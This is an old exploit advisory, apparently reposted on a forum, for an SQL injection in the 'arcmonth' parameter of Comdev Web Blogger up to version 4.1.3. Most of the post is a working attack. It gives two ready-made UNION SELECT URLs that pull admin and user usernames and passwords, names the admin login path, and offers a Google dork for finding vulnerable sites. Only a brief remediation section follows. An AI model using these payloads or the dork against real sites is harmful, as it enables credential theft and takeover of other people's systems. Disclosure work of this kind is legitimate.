Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability

Código:

Author : M.Hasran Addahroni
Date : July, 14 th 2008

Application : Comdev Web Blogger
version : <= 4.1.3
Vendor : http://www.comdevweb.com/blogger.php

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used
in an sql query.
This can be exploited thru the browser to manipulate SQL queries and pull the username and password
from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.

Poc/Exploit:
~~~~~~~~~

http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*

Admin Login at http://www.example.com/[PATH]/oneadmin/

Dork:
~~~~
Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"

Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini

saludos

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Diciembre 03, 2008, 05:10:06